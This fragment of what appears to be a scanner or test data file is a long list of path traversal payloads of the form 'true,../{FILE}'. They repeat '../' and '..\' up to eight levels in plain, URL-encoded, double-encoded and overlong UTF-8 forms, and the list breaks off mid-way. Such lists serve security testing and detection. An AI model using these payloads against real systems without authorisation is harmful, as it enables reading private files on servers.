"true,../{FILE}", + "true,../../{FILE}", + "true,../../../{FILE}", + "true,../../../../{FILE}", + "true,../../../../../{FILE}", + "true,../../../../../../{FILE}", + "true,../../../../../../../{FILE}", + "true,../../../../../../../../{FILE}", + "true,..%2f{FILE}", + "true,..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,..%252f{FILE}", + "true,..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,..\\{FILE}", + "true,..\\..\\{FILE}", + "true,..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%255c{FILE}", + "true,..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,..%c0%af{FILE}", + "true,..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,..%%32%66{FILE}", + "true,..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,..%%35%63{FILE}", + "true,..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}", + "true,../{FILE}", + "true,../../{FILE}", + "true,../../../{FILE}", + "true,../../../../{FILE}", + "true,../../../../../{FILE}", + "true,../../../../../../{FILE}", + "true,../../../../../../../{FILE}", + "true,../../../../../../../../{FILE}", + "true,..%2f{FILE}", + "true,..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + 